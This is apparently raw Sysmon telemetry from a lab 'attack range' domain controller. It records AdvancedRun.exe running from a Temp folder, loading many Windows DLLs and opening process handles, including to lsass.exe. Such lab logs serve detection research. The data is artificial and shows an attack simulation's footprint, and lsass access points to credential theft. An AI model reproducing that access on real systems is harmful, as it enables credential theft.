20:17:18.141{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004079671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.141{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004079670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.141{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004079669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.136{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004079668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.133{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079667Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004079663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.127{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.127{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.124{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.124{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.123{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft 
Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.123{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.119{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.119{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.118{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User 
Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.118{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.116{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.115{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004079639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.114{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.112{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.109{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.108{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.921{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\S